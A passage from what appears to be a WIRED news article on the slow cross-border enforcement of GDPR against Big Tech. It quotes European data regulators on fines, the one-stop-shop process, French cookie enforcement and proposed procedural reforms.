But at Big Tech levels where data is plentiful, the scale of complying with GDPR is different. One recent internal Facebook document obtained by Motherboard hints that the company doesn't really know what it does with your data—an assertion Facebook denied at the time. Equally, a WIRED and _Reveal_ joint investigation at the end of 2021 found serious shortcomings in the ways Amazon handles customer data. (Amazon said it had an “exceptional” track record in protecting data.)

Microsoft declined a request to comment. Neither Google nor Facebook provided comment in time for publication.

“There is a lag, especially on Big Tech, enforcing the law on Big Tech—and Big Tech means cross-border cases, and that means the one-stop-shop and the cooperation among the data protection authorities,” says Ulrich Kelber, the head of the German federal data protection regulator. The one-stop-shop allows all of Europe’s regulators to have a say on the final decision of the lead regulator in that case, which can then be challenged. Ireland’s fine against WhatsApp grew from the original proposed penalty of as little as €30 million ($31.8 million) to €225 million ($238.5 million) after other regulators weighed in. Another Irish case against Instagram is currently being discussed, Dixon says, which will add months to its final outcome.

The one-stop-shop was created under GPDR, meaning the process has started with teething problems, but four years in, a lot still needs to be improved. Tobias Judin, the head of international at Norway’s data protection authority, says that each week several drafts of decisions are circulated among Europe’s data regulators. “In the vast majority of those cases, we actually agree,” Judin says. (German authorities object the most.) Decisions can face a lot of back and forth between regulators, wrapped up in bureaucracy. “We do question whether, in those cases that have a European-wide impact, it makes sense and whether it is feasible that these cases are solely dealt with by one data protection authority until we reach the decision stage,” Judin says.

Luxembourg’s data regulator hit Amazon with a record-breaking €746 million ($790.6 million) fine last year, its first case against the retailer. Amazon is contesting the fine in court—in a statement to WIRED, the company repeated its assertion that “there has been no data breach, and no customer data has been exposed to any third party”—but Luxembourg’s regulator says investigations will always be lengthy despite it bringing in new ways to investigate companies. “I think under one year or one-half year, I think it’s almost impossible to have it closed before such a delay,” says Alain Herrmann, one of Luxembourg’s four data protection commissioners. “There are huge \[amounts of\] information to deal with.” Herrmann says Luxembourg has a few other international cases ongoing, but national secrecy laws prevent it from talking about them. “It’s just the \[one-stop-shop\] system, the lack of resources, the lack of clear law and procedure, which makes their job even more difficult,” Robert says.

The French data regulator has, in some ways, sidestepped the international GDPR process by directly pursuing companies’ use of cookies. Despite common beliefs, annoying cookie pop-ups don’t come from GDPR—they’re governed by the EU’s separate E-Privacy law, and the French regulator has taken advantage of this. Marie-Laure Denis, the head of French regulator CNIL, has hit Google, Amazon, and Facebook with hefty fines for bad cookie practices. Perhaps more importantly, it has forced companies to change their behavior. Google is altering its cookie banners across the whole of Europe following the French enforcement.

“We are starting to see really concrete changes to the digital ecosystems and evolution of practices, which is really what we are looking \[for\],” Denis says. She explains that CNIL will next look at data collection by mobile apps under the E-Privacy law, and cloud data transfers under GDPR. The cookie enforcement effort wasn’t to avoid GDPR’s protracted process, but it was more efficient, Denis says. “We still believe in the GDPR enforcement mechanism, but we need to make it work better—and quicker.”

In the last year, there have been growing calls to change how GDPR works. “Enforcement should be more centralized for big affairs,” Viviane Redding, the politician who proposed GDPR back in 2012, said of the data law in May last year. The calls have come as Europe passed its next two big pieces of digital regulation: the Digital Services Act and the Digital Markets Act. The laws, which focus on competition and internet safety, handle enforcement differently from GDPR; in some instances, the European Commission will investigate Big Tech companies. The move is a nod to the fact that GDPR enforcement may not have been as smooth as politicians would have liked.

There appears to be little appetite to reopen GDPR itself; however, smaller tweaks could help improve enforcement. At a recent meeting of data regulators held by the European Data Protection Board, a body that exists to guide regulators, countries agreed that some international cases will work to fixed deadlines and timelines and said they would try to “join forces” on some investigations. Norway’s Judin says the move is positive but questions how effective it will be in practice.

Massé, from Access Now, says a small amendment to GDPR could significantly address some of the biggest current enforcement problems. Legislation could ensure data protection authorities handle complaints in the same way (including using the same forms), explicitly lay out how the one-stop-shop should work, and make sure that procedures in individual countries are the same, Massé says. In short, it could clarify how GDPR enforcement should be handled by every country.

The view is also shared by data regulators, at least to some degree. France’s Denis says regulators should share more information, more quickly on cross-border cases so they can build up an informal consensus around a potential decision. “The Commission could also, for example, look at resources given to data protection authorities,” Denis says. “Because it’s a member state’s obligation to give sufficient resources to data protection authorities to carry out their duties.” The staff and resources regulators have to investigate and enforce is dwarfed by those of Big Tech.

“Potentially, if there was the possibility for some kind of an instrument specific to the GDPR—being a legal instrument—that would specify certain process and procedural issues, that might assist,” Ireland’s Dixon says. She adds that complications that could be ironed out include issues around access to files during investigations, whether those making the complaints are given access to the investigation process, and problems in translations. “There’s a whole range of inconsistencies around that, giving rise to delays and dissatisfaction on all sides,” Dixon says.

Without some changes—and strong enforcement—civil society groups warn that GDPR could fail to stop the worst practices of Big Tech companies and improve people’s sense of privacy. “The immediate thing that needs to be addressed is the Big Tech firms,” Ryan says. “If we cannot deal with Big Tech, we will create a permanence to the fatalism that people feel about privacy and data.” Four years in, Massé says she still has hope for GDPR enforcement. “It's really not what we had hoped for. But it’s also not in a place that I think we can start digging a grave for the GDPR and forget about it.”

Tag

#google